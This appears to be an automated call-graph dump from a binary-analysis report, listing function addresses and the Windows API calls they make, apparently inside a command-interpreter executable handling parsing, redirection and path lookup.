20451->20449 20454 1b8959 449 API calls 20451->20454 20453 19ded0 554 API calls 20452->20453 20455 19de80 20453->20455 20454->20449 20455->20456 20457 19cf10 547 API calls 20455->20457 20456->20408 20457->20456 20459 1ad56e 20458->20459 20464 19cf38 20458->20464 20460 19d03b 20461 19d048 20460->20461 20462 199950 448 API calls 20460->20462 20461->20413 20465 1ad4ca 20462->20465 20463 19cf9e 20467 19d600 532 API calls 20463->20467 20464->20459 20464->20460 20464->20463 20471 19cf86 wcschr 20464->20471 20501 19d0fa 20464->20501 20688 19d600 20464->20688 20465->20413 20469 19cfb7 20467->20469 20468 19cf67 iswspace 20468->20464 20470 1ad4d2 20469->20470 20474 19cfc7 20469->20474 20472 19d600 532 API calls 20470->20472 20470->20501 20471->20463 20471->20464 20473 1ad4ea 20472->20473 20482 19d600 532 API calls 20473->20482 20475 19cfe2 iswdigit 20474->20475 20477 19d0a6 20474->20477 20481 19d4a7 20474->20481 20474->20501 20476 19cfff 20475->20476 20503 19d341 20475->20503 20484 19d600 532 API calls 20476->20484 20494 19d027 20476->20494 20485 19d0e8 iswdigit 20477->20485 20486 19d0b5 iswspace 20477->20486 20477->20503 20478 19d218 20478->20413 20479 19d600 532 API calls 20479->20503 20480 19d190 20480->20478 20483 1978e4 448 API calls 20480->20483 20487 19d600 532 API calls 20481->20487 20482->20503 20483->20459 20490 19d2a5 20484->20490 20489 19d310 20485->20489 20485->20501 20486->20475 20488 19d0c7 20486->20488 20491 19d4ac 20487->20491 20493 19d0d0 wcschr 20488->20493 20488->20501 20492 19d328 iswspace 20489->20492 20489->20503 20499 19d600 532 API calls 20490->20499 20504 19d2ae 20490->20504 20491->20460 20491->20473 20491->20475 20491->20501 20495 19d484 20492->20495 20492->20503 20493->20475 20493->20485 20494->20413 20500 19a62f wcschr 20495->20500 20496 19d600 532 API calls 20496->20501 20497 19d16d iswdigit 20497->20501 20498 19d1b4 iswspace 20498->20480 20498->20501 20499->20504 20500->20503 20501->20476 20501->20480 20501->20496 20501->20497 20501->20498 20502 19d23e iswspace 20501->20502 20505 19d1d1 wcschr 20501->20505 20502->20501 20506 19d253 wcschr 20502->20506 20503->20475 20503->20479 20503->20501 20504->20494 20507 19d600 532 API calls 20504->20507 20509 19a62f wcschr 20504->20509 20510 19d426 iswdigit 20504->20510 20505->20480 20505->20497 20506->20501 20508 19d405 iswspace 20507->20508 20508->20504 20509->20504 20510->20494 20511 19d438 20510->20511 20512 19d600 532 API calls 20511->20512 20512->20494 20514 19ccd0 576 API calls 20513->20514 20515 19e0a7 20514->20515 20515->20408 20517 19ccd0 576 API calls 20516->20517 20518 19e227 20517->20518 20518->20408 20533 19df00 20519->20533 20520 19df16 iswdigit 20522 19df27 20520->20522 20520->20533 20521 19dcd0 448 API calls 20521->20533 20523 19df2f 20522->20523 20526 19cf10 547 API calls 20522->20526 20523->20444 20524 1adaf9 longjmp 20528 19e26b 20524->20528 20525 19df63 iswdigit 20525->20533 20526->20523 20527 1adaec 20529 1b8959 449 API calls 20527->20529 20528->20444 20530 1adaf1 20529->20530 20530->20524 20532 19e059 iswdigit 20532->20533 20533->20520 20533->20521 20533->20522 20533->20524 20533->20525 20533->20527 20533->20528 20533->20532 20534 1b8959 449 API calls 20533->20534 20535 19acb0 448 API calls 20533->20535 20536 19cc70 548 API calls 20533->20536 20611 19a931 20533->20611 20534->20533 20535->20533 20536->20533 20538 19e0c1 _wcsicmp 20537->20538 20539 19e15b 20537->20539 20540 19e0dc _wcsicmp 20538->20540 20541 19e203 _wcsicmp 20538->20541 20543 19dcd0 448 API calls 20539->20543 20544 19e1db 20539->20544 20540->20541 20545 19e0f7 _wcsicmp 20540->20545 20546 1a2a35 20541->20546 20594 1a2a63 20541->20594 20547 19e17d 20543->20547 20548 1b8959 449 API calls 20544->20548 20567 19e1e0 20544->20567 20545->20539 20549 19e112 _wcsicmp 20545->20549 20630 19bb90 20546->20630 20552 1a9ca7 20547->20552 20566 19e187 20547->20566 20553 19e1f5 20548->20553 20549->20539 20550 19e12d _wcsicmp 20549->20550 20550->20539 20554 19e144 _wcsicmp 20550->20554 20557 1b9922 448 API calls 20552->20557 20553->20451 20554->20539 20555 1a2a47 20561 19cc70 548 API calls 20555->20561 20555->20594 20556 19e1bf 20560 19a8c4 562 API calls 20556->20560 20558 1a9cac longjmp 20557->20558 20559 195e22 20558->20559 20563 1a9cc3 20559->20563 20569 195da6 448 API calls 20559->20569 20564 19e1c9 20560->20564 20565 1a2a5b 20561->20565 20562 19cc70 548 API calls 20562->20566 20563->20451 20564->20567 20572 19cc70 548 API calls 20564->20572 20647 199907 20565->20647 20566->20556 20566->20562 20570 19e1b4 20566->20570 20567->20451 20573 195e31 20569->20573 20571 19cf10 547 API calls 20570->20571 20571->20556 20572->20544 20574 198f21 448 API calls 20573->20574 20577 195e3a 20574->20577 20575 1a2a7c _wcsicmp 20580 1a2a92 _wcsicmp 20575->20580 20575->20594 20576 1a2ae4 20578 1af500 20576->20578 20579 1a2af4 iswspace 20576->20579 20581 195e1d 20577->20581 20586 1b8c50 448 API calls 20577->20586 20583 1b8959 449 API calls 20578->20583 20579->20578 20582 1a2b0b 20579->20582 20584 1a2aa8 _wcsicmp 20580->20584 20580->20594 20581->20451 20588 19a62f wcschr 20582->20588 20589 1a2b81 20583->20589 20590 1a2abe _wcsicmp 20584->20590 20584->20594 20585 19dcd0 448 API calls 20585->20594 20600 195e68 20586->20600 20587 19cc70 548 API calls 20587->20594 20591 1a2b1f 20588->20591 20593 1b8959 449 API calls 20589->20593 20610 1a2b8c 20589->20610 20590->20594 20599 1a2ad7 20590->20599 20591->20578 20596 1a2b34 20591->20596 20592 1af4d2 20595 1b9922 448 API calls 20592->20595 20597 1af50f 20593->20597 20594->20575 20594->20576 20594->20585 20594->20587 20594->20592 20602 1b8959 449 API calls 20594->20602 20598 1af4d7 longjmp 20595->20598 20654 1a2c23 20596->20654 20597->20597 20598->20599 20599->20576 20604 1b8959 449 API calls 20599->20604 20600->20451 20602->20594 20603 1a2b4b 20658 1a33ca 20603->20658 20604->20576 20610->20451 20612 19cc70 548 API calls 20611->20612 20613 19a93b 20612->20613 20614 19a942 20613->20614 20616 1b8959 449 API calls 20613->20616 20615 19dcd0 448 API calls 20614->20615 20617 19a94f 20614->20617 20615->20617 20616->20614 20618 19a959 20617->20618 20619 1b9922 448 API calls 20617->20619 20618->20533 20620 1a9cac longjmp 20619->20620 20621 195e22 20620->20621 20622 1a9cc3 20621->20622 20623 195da6 448 API calls 20621->20623 20622->20533 20624 195e31 20623->20624 20625 198f21 448 API calls 20624->20625 20626 195e3a 20625->20626 20627 195e1d 20626->20627 20628 1b8c50 448 API calls 20626->20628 20627->20533 20629 195e68 20628->20629 20629->20533 20631 19dcd0 448 API calls 20630->20631 20632 19bba1 20631->20632 20633 19dcd0 448 API calls 20632->20633 20638 19bbc1 20632->20638 20633->20638 20634 1b9922 448 API calls 20635 1a9cac longjmp 20634->20635 20636 195e22 20635->20636 20637 1a9cc3 20636->20637 20640 195da6 448 API calls 20636->20640 20637->20555 20638->20634 20639 19bbde 20638->20639 20639->20555 20641 195e31 20640->20641 20642 198f21 448 API calls 20641->20642 20643 195e3a 20642->20643 20644 195e1d 20643->20644 20645 1b8c50 448 API calls 20643->20645 20644->20555 20646 195e68 20645->20646 20646->20555 20648 19bc30 448 API calls 20647->20648 20649 199938 20648->20649 20678 19a800 20649->20678 20652 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20653 19994e 20652->20653 20653->20594 20655 19cc70 548 API calls 20654->20655 20656 1a2c2f _wcsicmp 20655->20656 20657 1a2c41 20656->20657 20657->20603 20659 19cc70 548 API calls 20658->20659 20660 1a33e2 20659->20660 20661 1af776 20660->20661 20671 1a33eb 20660->20671 20662 1b8959 449 API calls 20661->20662 20663 1af77b 20662->20663 20664 19cc70 548 API calls 20664->20671 20666 1a3457 20669 19dcd0 448 API calls 20669->20671 20670 19dd20 448 API calls 20670->20671 20671->20663 20671->20664 20671->20666 20671->20669 20671->20670 20672 1af78c 20671->20672 20673 1b9922 448 API calls 20672->20673 20679 199943 20678->20679 20680 19a82f 20678->20680 20679->20652 20680->20679 20681 1b9a0e 449 API calls 20680->20681 20682 1ac971 20681->20682 20682->20679 20683 1963bd 448 API calls 20682->20683 20685 1ac982 20683->20685 20685->20679 20689 19d613 20688->20689 20690 19d660 532 API calls 20689->20690 20691 19d627 20689->20691 20692 1a80cd 20690->20692 20691->20468 20692->20468 20694 19dcd0 448 API calls 20693->20694 20695 19da45 20694->20695 20696 1ad948 memset longjmp 20695->20696 20697 19da52 20695->20697 20698 19da81 20696->20698 20697->20698 20699 19dad3 20697->20699 20700 1ad9ad 20697->20700 20712 1ad97b memcpy 20697->20712 20762 19ee03 20697->20762 20813 19bf70 20697->20813 20698->20328 20699->20700 20701 19daf1 20699->20701 20704 1978e4 448 API calls 20700->20704 20702 19dc60 2 API calls 20701->20702 20703 19daf6 20702->20703 20703->20328 20714 1ad9a8 20704->20714 20707 19dc60 2 API calls 20708 1ad9cc longjmp 20707->20708 20709 1ad9da 20708->20709 20710 1978e4 448 API calls 20709->20710 20711 1ad9e3 20710->20711 20711->20328 20713 1978e4 448 API calls 20712->20713 20713->20714 20714->20707 20716 1b7728 20715->20716 20717 1b76fd 20715->20717 20719 1b7d26 20716->20719 20722 1b7746 20716->20722 20724 199950 448 API calls 20716->20724 20718 1963bd 448 API calls 20717->20718 20721 1b7708 EnterCriticalSection LeaveCriticalSection 20718->20721 20720 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20719->20720 20723 1b7d3d 20720->20723 20721->20716 20725 19ec2e 448 API calls 20722->20725 20726 1b7750 20722->20726 20723->20322 20724->20722 20725->20726 20727 198e9e 448 API calls 20726->20727 20728 1b77ad 20727->20728 20867 1b7654 20728->20867 20731 1b7c99 20732 199abf _vsnwprintf 20731->20732 20733 1b7cba 20732->20733 20737 19998d 448 API calls 20733->20737 20734 1b78b8 towupper 20736 1b77fa 20734->20736 20735 199abf _vsnwprintf 20735->20736 20736->20733 20736->20734 20736->20735 20740 196854 448 API calls 20736->20740 20741 194d08 4 API calls 20736->20741 20742 199310 448 API calls 20736->20742 20743 1b7afc GetDriveTypeW 20736->20743 20745 1a72ef ApiSetQueryApiSetPresence 20736->20745 20746 199abf _vsnwprintf 20736->20746 20871 1a640a FormatMessageW 20736->20871 20738 1b7cfe 20737->20738 20738->20719 20739 1b7d07 EnterCriticalSection LeaveCriticalSection 20738->20739 20739->20719 20740->20736 20741->20736 20742->20736 20743->20736 20745->20736 20747 1b79ed LocalFree 20746->20747 20747->20736 20748->20327 20750 1b4799 448 API calls 20749->20750 20751 1b763c 20750->20751 20752 1b7649 GetLastError 20751->20752 20753 1b7645 20751->20753 20752->20753 20753->20343 20755 1ba0ef GetStdHandle 20754->20755 20756 1b4799 448 API calls 20755->20756 20757 1ba110 20756->20757 20758 1ba129 20757->20758 20759 1ba114 wcschr 20757->20759 20760 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20758->20760 20759->20755 20759->20758 20761 1ba133 20760->20761 20761->20386 20763 19ee4c 20762->20763 20764 19ee52 20762->20764 20763->20764 20765 19eea7 20763->20765 20766 19ee5a wcsrchr 20764->20766 20769 19ee68 20764->20769 20767 1ade31 20765->20767 20770 1a1a05 5 API calls 20765->20770 20766->20769 20767->20769 20772 1adf50 longjmp 20767->20772 20773 1ade49 ??_V@YAXPAX 20767->20773 20785 1adecb 20767->20785 20768 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20771 19ee88 20768->20771 20769->20768 20788 19eed8 20770->20788 20771->20697 20772->20767 20773->20769 20774 19ef50 wcsrchr 20778 19ef67 wcsrchr 20774->20778 20774->20788 20775 1ade80 wcschr 20779 1ade9e 20775->20779 20781 1adf01 20775->20781 20776 19ef09 towlower wcsrchr 20777 19f1dd wcsrchr 20776->20777 20776->20788 20780 19f1f7 towlower 20777->20780 20777->20788 20778->20781 20778->20788 20782 19dcd0 448 API calls 20779->20782 20780->20788 20781->20773 20783 1978e4 448 API calls 20781->20783 20786 1adeb5 20782->20786 20783->20767 20784 19acb0 448 API calls 20784->20788 20785->20773 20786->20767 20836 1a1d90 20786->20836 20787 19efef ??_V@YAXPAX 20787->20769 20788->20767 20788->20773 20788->20774 20788->20775 20788->20776 20788->20781 20788->20784 20790 19efe6 20788->20790 20791 19f009 GetFullPathNameW 20788->20791 20795 1adf72 SearchPathW 20788->20795 20796 19efed 20788->20796 20797 1a0207 10 API calls 20788->20797 20799 1adfb9 wcsrchr 20788->20799 20800 19f067 memset 20788->20800 20802 1adff6 GetFileAttributesExW 20788->20802 20803 1ae07c FileTimeToSystemTime 20788->20803 20805 19f18a 20788->20805 20809 196854 448 API calls 20788->20809 20811 19f164 wcsrchr 20788->20811 20812 199310 448 API calls 20788->20812 20849 1bb325 20788->20849 20793 19acb0 448 API calls 20790->20793 20791->20788 20793->20796 20794 19dc60 2 API calls 20794->20781 20795->20788 20796->20769 20796->20787 20798 19f03d wcsrchr 20797->20798 20798->20788 20798->20799 20799->20788 20801 19e3f0 17 API calls 20800->20801 20801->20788 20802->20788 20803->20788 20804 19acb0 448 API calls 20806 19f1ba 20804->20806 20805->20804 20807 1ae271 20805->20807 20806->20796 20808 19f1c8 ??_V@YAXPAX 20806->20808 20808->20796 20809->20788 20811->20788 20811->20807 20812->20788 20814 19dcd0 448 API calls 20813->20814 20817 19bfc8 20814->20817 20815 1acfad longjmp 20824 19c02c 20815->20824 20816 1acfc1 longjmp 20816->20824 20818 19dcd0 448 API calls 20817->20818 20817->20824 20835 19c155 20817->20835 20818->20824 20819 19ec2e 448 API calls 20819->20824 20822 19c1ef wcstol 20822->20824 20823 19c111 20825 1ad029 20823->20825 20823->20835 20824->20815 20824->20816 20824->20819 20824->20822 20824->20823 20832 19c26d 20824->20832 20833 19c0bf 20824->20833 20824->20835 20828 1978e4 448 API calls 20825->20828 20826 1ad042 memcpy 20829 1ad063 20826->20829 20827 19c333 memcpy 20830 19c1b2 _wcsnicmp 20827->20830 20831 1ad036 longjmp 20828->20831 20830->20835 20831->20826 20834 19c27d wcstol 20832->20834 20832->20835 20862 19c3f4 20833->20862 20834->20835 20835->20826 20835->20827 20835->20830 20835->20833 20837 1a1da8 20836->20837 20838 1a1e5a 20836->20838 20837->20838 20857 19ab7f 20837->20857 20838->20794 20841 19acb0 448 API calls 20842 1a1dc2 20841->20842 20843 1a01f5 wcsrchr 20842->20843 20848 1a1dd1 20843->20848 20844 1af106 20845 1a1e4a 20846 19dc60 2 API calls 20845->20846 20846->20838 20847 1a1e11 _wcsnicmp 20847->20848 20848->20844 20848->20845 20848->20847 20848->20848 20850 1bb35b __aulldvrm 20849->20850 20850->20850 20851 1bb42e 20850->20851 20853 1bb3f4 memmove 20850->20853 20852 1bb445 wcsncmp 20851->20852 20854 1bb432 20851->20854 20852->20854 20853->20850 20855 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20854->20855 20856 1bb4f8 20855->20856 20856->20788 20858 19abaa 20857->20858 20861 19ab88 20857->20861 20858->20841 20859 19ab89 iswspace 20860 19ab98 wcschr 20859->20860 20859->20861 20860->20858 20860->20861 20861->20858 20861->20859 20861->20860 20863 19dc60 2 API calls 20862->20863 20864 19c3fb 20863->20864 20865 19dc60 2 API calls 20864->20865 20866 19c0df 20865->20866 20866->20697 20868 1b7660 20867->20868 20869 1b7679 20867->20869 20870 1a6e25 4 API calls 20868->20870 20869->20719 20869->20731 20869->20736 20870->20869 20871->20736 20873 1b8727 20872->20873 20878 1b8781 20872->20878 20874 19998d 448 API calls 20873->20874 20877 1b8736 20874->20877 20875 199950 448 API calls 20875->20877 20876 19998d 448 API calls 20876->20877 20877->20875 20877->20876 20877->20878 20880 199950 448 API calls 20879->20880 20881 1b86f9 20880->20881 20882 1b871d 448 API calls 20881->20882 20883 1b8702 20882->20883 20884 1b8791 448 API calls 20883->20884 20885 1b870d 20884->20885 20886 1b8791 448 API calls 20885->20886 20887 1b8718 20886->20887 20887->20294 20889 19adc6 20888->20889 20893 1acc3f 20888->20893 20890 1a5a2e memset 20889->20890 20892 19add1 20890->20892 20891 1acc6a GetLastError 20891->20893 20892->20893 20895 19e3f0 17 API calls 20892->20895 20893->20891 20894 1978e4 448 API calls 20893->20894 20897 1a61e6 ??_V@YAXPAX 20893->20897 20894->20893 20896 19adef 20895->20896 20896->20893 20898 19b0b9 20896->20898 20899 19ae05 20896->20899 20897->20893 20900 1a0b12 5 API calls 20898->20900 21139 19e950 memset 20899->21139 20902 19b0c1 20900->20902 20902->20893 21268 197f47 memset 20902->21268 20904 19b118 21282 1a21ee 20904->21282 20905 19ae23 20905->20893 20909 1acc7c 20905->20909 20915 19ae44 20905->20915 20913 1a61e6 ??_V@YAXPAX 20909->20913 20910 19b11f 21286 1a2940 20910->21286 20911 19b0dc towupper 20914 19b100 20911->20914 20912 19aea1 20912->20893 20928 19af6b 20912->20928 20934 19aecb wcschr 20912->20934 20940 19b176 20912->20940 20941 19b13b 20912->20941 20913->20912 20914->20904 20914->20914 20917 1acc75 20914->20917 20915->20912 20918 19bc30 448 API calls 20915->20918 20919 1b9a7d 448 API calls 20917->20919 20920 19ae86 20918->20920 20919->20909 20923 19ae91 20920->20923 20925 19b00e wcsncmp 20920->20925 20921 19afc2 21196 19b17b 20921->21196 20923->20912 20927 19a800 449 API calls 20923->20927 20925->20912 20925->20923 20926 1a61e6 ??_V@YAXPAX 20930 19afe8 20926->20930 20927->20912 21168 19b1b0 20928->21168 20932 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20930->20932 20936 19b002 20932->20936 20933 1a0b12 5 API calls 20933->20941 20934->20912 20954 19b033 20934->20954 20935 19af83 20938 19af99 20935->20938 20939 19afc4 20935->20939 20936->18661 20942 19b02c 20938->20942 20943 19afa5 20938->20943 21190 19aa50 20939->21190 20948 1978e4 448 API calls 20940->20948 20941->20912 20941->20933 20941->20940 20949 197f47 23 API calls 20941->20949 20958 1accc9 GetLastError 20941->20958 21200 19c6c0 20942->21200 20945 19b085 20943->20945 20946 19afb1 20943->20946 21253 199dc0 20945->21253 20951 19afbd 20946->20951 20952 19b0a2 20946->20952 20948->20893 20949->20941 21187 199770 20951->21187 20952->20910 20956 19b0aa 20952->20956 20953 19b031 20953->20921 20954->20945 20955 19b193 20954->20955 20959 1a6c78 4 API calls 20955->20959 21172 1959a0 20956->21172 20958->20940 20959->20940 20962 19e683 20961->20962 20963 19e6c6 20961->20963 20962->20963 20964 19e689 20962->20964 20967 19e71d 20962->20967 20968 19e6ec 20962->20968 20973 19e733 20962->20973 20963->18631 22134 19e790 20964->22134 20972 19e790 457 API calls 20967->20972 20968->20963 20971 19e790 457 API calls 20968->20971 20969 19e790 457 API calls 20974 19e6ad 20969->20974 20970 19e790 457 API calls 20970->20963 20971->20968 20972->20973 20973->20963 20973->20970 20974->20963 20975 19e790 457 API calls 20974->20975 20975->20974 20977 1a03cb 20976->20977 20978 1a03e1 20977->20978 20979 1ae7bf iswdigit 20977->20979 20980 1a03f3 20978->20980 20981 1a0416 20978->20981 20979->20977 20982 1ae7e2 20979->20982 22148 1a15f0 20980->22148 20986 1a03f8 20981->20986 22152 1a2960 wcstol wcstol 20981->22152 20985 1978e4 448 API calls 20982->20985 20987 1a040d 20985->20987 20988 19e470 916 API calls 20986->20988 20987->18661 20988->20987 20990 19e470 917 API calls 20989->20990 20991 19ab63 20990->20991 20992 19ab76 20991->20992 20993 19e470 917 API calls 20991->20993 20992->18661 20993->20992 20995 19e3f0 17 API calls 20994->20995 21009 199f61 20995->21009 20996 19a0d9 20997 19a0ef 20996->20997 20998 19a0e7 ??_V@YAXPAX 20996->20998 21000 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 20997->21000 20998->20997 20999 199fd7 21002 19dcd0 448 API calls 20999->21002 21027 199ff4 20999->21027 21001 19a0fe 21000->21001 21001->18635 21001->18649 21002->21027 21003 1a0060 5 API calls 21003->21009 21005 1ac376 _get_osfhandle SetFilePointer 21006 1ac392 21005->21006 21005->21027 21010 199abf _vsnwprintf 21006->21010 21008 19a02b _get_osfhandle 21011 19a03d _get_osfhandle 21008->21011 21008->21027 21009->20996 21009->20999 21009->21003 21012 1ac3a9 21010->21012 21011->21027 21017 1978e4 448 API calls 21012->21017 21013 1ac439 21015 199abf _vsnwprintf 21013->21015 21014 19a16c _close 21014->21027 21015->21012 21016 19dd98 6 API calls 21016->21027 21018 1ac463 21017->21018 21019 19a125 2 API calls 21018->21019 21019->20996 21020 19a1d6 _dup2 21020->21027 21021 1ac3d3 21023 1a1d90 451 API calls 21021->21023 21022 1a0590 19 API calls 21022->21027 21028 1ac3dd 21023->21028 21024 1ac40c 21025 19a1d6 _dup2 21024->21025 21030 1ac42d 21025->21030 21026 19a11c 21032 19a125 2 API calls 21026->21032 21027->20996 21027->21005 21027->21008 21027->21013 21027->21014 21027->21016 21027->21020 21027->21021 21027->21022 21027->21024 21027->21026 21029 1ac4aa 21027->21029 22157 19a1a8 _dup 21027->22157 22159 1b9fcf _get_osfhandle GetFileType 21027->22159 21028->21029 21035 1ac3f2 SearchPathW 21028->21035 21031 19a125 2 API calls 21029->21031 21033 1ac434 21030->21033 21034 1ac475 21030->21034 21036 1ac4af 21031->21036 21038 1ac47f 21032->21038 21039 19a16c _close 21033->21039 21037 19a16c _close 21034->21037 21035->21024 21035->21029 21040 1b9edb 448 API calls 21036->21040 21037->21026 21041 199abf _vsnwprintf 21038->21041 21039->21013 21040->20996 21042 1ac496 21041->21042 21043 1978e4 448 API calls 21042->21043 21043->20996 21045 19e470 917 API calls 21044->21045 21046 1a03a2 21045->21046 21046->18661 21048 19dcd0 448 API calls 21047->21048 21049 1a0776 21048->21049 21050 1a089d 21049->21050 21051 1a0792 21049->21051 21086 1ae9b9 21049->21086 21052 19dcd0 448 API calls 21050->21052 21055 19dd20 448 API calls 21051->21055 21053 1a08a5 21052->21053 21054 19dcd0 448 API calls 21053->21054 21061 1a07de 21054->21061 21056 1a07b3 21055->21056 21057 1a07bb 21056->21057 21058 1ae8bd 21056->21058 21060 19dd20 448 API calls 21057->21060 21059 19dc60 2 API calls 21058->21059 21062 1a07d6 21059->21062 21060->21062 21063 1a0812 21061->21063 21064 1a08c5 21061->21064 21061->21086 21062->21061 21067 19dc60 2 API calls 21062->21067 21065 1a0818 21063->21065 21066 1a0875 21063->21066 21068 19bc30 448 API calls 21064->21068 22160 1a0bf0 21065->22160 21071 1a087f 21066->21071 21072 1ae8e7 21066->21072 21067->21061 21070 1a08d2 wcstol 21068->21070 22275 19a7d5 21070->22275 21074 19bc30 448 API calls 21071->21074 21075 1a0060 5 API calls 21072->21075 21077 1a088c 21074->21077 21079 1ae8fd GetFullPathNameW 21075->21079 21076 1a08ec wcstol 21080 19a7d5 21076->21080 22224 196e57 21077->22224 21082 1ae915 21079->21082 21081 1a0906 wcstol 21080->21081 21094 1a0922 21081->21094 21083 19dcd0 448 API calls 21082->21083 21087 1978e4 448 API calls 21082->21087 21089 1ae942 GetFullPathNameW 21082->21089 21092 1ae95d 21082->21092 21083->21082 21084 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21088 1a0871 21084->21088 21085 1a0822 21085->21084 21085->21086 21087->21082 21088->18661 21089->21082 21090 1b98b5 453 API calls 21090->21094 21091 199abf _vsnwprintf 21091->21094 21093 19bc30 448 API calls 21092->21093 21095 1ae99d 21093->21095 21094->21072 21094->21090 21094->21091 21098 1a198f 3 API calls 21094->21098 22277 1a0bbb 21094->22277 22286 1b3e66 21095->22286 21098->21094 21101 19e5d8 21099->21101 21102 19eda4 21099->21102 21100 19edb7 _wcsicmp 21100->21101 21100->21102 21101->18648 21101->18662 21102->21100 21102->21101 21104 1a2090 21103->21104 21105 19dcd0 448 API calls 21104->21105 21106 1a20a9 21105->21106 21107 19b1b0 448 API calls 21106->21107 21131 19e613 21106->21131 21108 1a20ba 21107->21108 21109 19f410 464 API calls 21108->21109 21108->21131 21110 1a20d2 21109->21110 21111 1a20d9 GetConsoleTitleW 21110->21111 21112 1a212f 21110->21112 21115 19ad26 450 API calls 21111->21115 21113 1a217a 21112->21113 21114 1a2134 GetConsoleTitleW 21112->21114 21117 1af23f 21113->21117 21118 1a2183 21113->21118 21116 19ad26 450 API calls 21114->21116 21119 1a20f2 21115->21119 21122 1a214d 21116->21122 21121 198bc7 448 API calls 21117->21121 21123 1a219f 21118->21123 21124 1af24d 21118->21124 21118->21131 22340 199458 21119->22340 21121->21131 21126 1a1a47 915 API calls 21122->21126 21127 1978e4 448 API calls 21123->21127 21129 1978e4 448 API calls 21124->21129 21125 1a2107 22399 1a21b5 21125->22399 21130 1a2164 21126->21130 21127->21131 21129->21131 22402 1a21c1 21130->22402 21131->18661 21134 1a5807 21133->21134 21138 1a5833 21133->21138 21135 1a5813 _setjmp3 21134->21135 21136 1a5825 21135->21136 21135->21138 22503 1a56c4 21136->22503 21138->18659 21140 19e9b2 21139->21140 21150 19ea65 21139->21150 21141 19e3f0 17 API calls 21140->21141 21148 19e9c3 21141->21148 21142 19e9f6 wcschr 21143 19ea3d 21142->21143 21142->21148 21144 19ec1e 21143->21144 21145 19ebf0 GetFileAttributesW 21143->21145 21143->21150 21144->21145 21147 19ebfc 21145->21147 21146 19ea0e wcschr 21146->21148 21147->21150 21148->21142 21148->21143 21148->21146 21148->21150 21162 19eb41 21148->21162 21149 19ea7e _wcsicmp 21149->21150 21150->21149 21156 19ea99 21150->21156 21151 19eb7e iswspace 21152 19eac3 21151->21152 21151->21162 21153 1add3f 21152->21153 21154 19eaf7 21152->21154 21160 19dcd0 448 API calls 21153->21160 21157 19eb0f 21154->21157 21158 19eb05 ??_V@YAXPAX 21154->21158 21155 19a62f wcschr 21155->21162 21156->21152 21156->21153 21159 19ed90 _wcsicmp 21156->21159 21161 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21157->21161 21158->21157 21159->21162 21163 1add80 21160->21163 21164 19ae12 21161->21164 21162->21151 21162->21152 21162->21153 21162->21155 21165 1b9922 448 API calls 21163->21165 21167 1add9e 21163->21167 21164->20904 21164->20905 21166 1add91 longjmp 21165->21166 21166->21167 21169 19b1c9 21168->21169 21170 19dcd0 448 API calls 21169->21170 21171 19af78 21170->21171 21171->20935 21175 19ad26 21171->21175 21289 195ea3 memset 21172->21289 21176 19ad40 21175->21176 21177 19ad37 21175->21177 21176->20935 21177->21176 21178 19dcd0 448 API calls 21177->21178 21179 1acb7b 21178->21179 21179->21176 21180 1acb85 GetConsoleTitleW 21179->21180 21180->21176 21181 1acb9b 21180->21181 21182 19dd20 448 API calls 21181->21182 21186 1acbcd 21182->21186 21183 1acc33 21184 19dc60 2 API calls 21183->21184 21184->21176 21185 1acc2c SetConsoleTitleW 21185->21183 21186->21183 21186->21185 21355 199cc0 21187->21355 21191 1ac9eb 21190->21191 21192 19aa66 21190->21192 21194 19aa75 489 API calls 21191->21194 21562 19aa75 21192->21562 21195 19aa6b 21194->21195 21195->20921 21195->21195 21197 19afdd 21196->21197 21198 19b185 21196->21198 21197->20926 21198->21197 21199 1accfa SetConsoleTitleW 21198->21199 21199->21197 21201 19c709 21200->21201 21202 19c7ae 21200->21202 21201->21202 21742 19b3c1 21201->21742 21204 1a1cb1 450 API calls 21202->21204 21206 1b98b5 453 API calls 21202->21206 21207 1978e4 448 API calls 21202->21207 21212 1b4191 448 API calls 21202->21212 21215 19c8b3 _get_osfhandle SetFilePointer 21202->21215 21217 19c8da _get_osfhandle GetFileType 21202->21217 21218 19c799 21202->21218 21221 19caa2 21202->21221 21222 1ad162 memcmp 21202->21222 21231 19c808 MultiByteToWideChar 21202->21231 21232 1a6c78 4 API calls 21202->21232 21235 19c7b8 SetFilePointer 21202->21235 21236 1ad1ce AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21202->21236 21237 19c86f wcschr 21202->21237 21238 19ca03 iswspace 21202->21238 21239 19ca1e wcschr 21202->21239 21240 19caeb wcschr 21202->21240 21241 19ca49 wcschr 21202->21241 21242 1ad2b3 _get_osfhandle SetFilePointer 21202->21242 21243 19cb10 iswspace 21202->21243 21244 19cb25 wcschr 21202->21244 21245 1ad322 _get_osfhandle SetFilePointer 21202->21245 21246 1ad302 WideCharToMultiByte 21202->21246 21247 19cb50 iswspace 21202->21247 21248 19cb80 wcschr 21202->21248 21249 19cb65 wcschr 21202->21249 21250 19cbc9 _wcsicmp 21202->21250 21252 1ad3d3 WideCharToMultiByte 21202->21252 21204->21202 21206->21202 21207->21202 21208 19e272 453 API calls 21209 19c732 21208->21209 21209->21202 21212->21202 21215->21202 21215->21217 21217->21202 21220 19c901 SetFilePointer AcquireSRWLockShared ReadFile ReleaseSRWLockShared 21217->21220 21223 19a16c _close 21218->21223 21220->21202 21225 1ad3fc 21221->21225 21228 19cabd _get_osfhandle SetFilePointer 21221->21228 21222->21202 21224 19ca81 21223->21224 21226 1a6b30 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 4 API calls 21224->21226 21227 1a1cb1 450 API calls 21225->21227 21229 19ca90 21226->21229 21230 1ad409 21227->21230 21228->20953 21229->20953 21233 1978e4 448 API calls 21230->21233 21231->21202 21232->21202 21234 1ad427 21233->21234 21235->21202 21236->21202 21237->21202 21238->21202 21238->21239 21239->21202 21240->21202 21240->21242 21241->21202 21242->21202 21242->21243 21243->21202 21243->21244 21244->21202 21245->21202 21246->21245 21247->21202 